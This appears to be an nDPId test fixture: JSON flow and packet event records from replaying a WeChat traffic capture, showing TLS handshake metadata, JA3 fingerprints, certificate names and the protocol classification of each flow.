{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 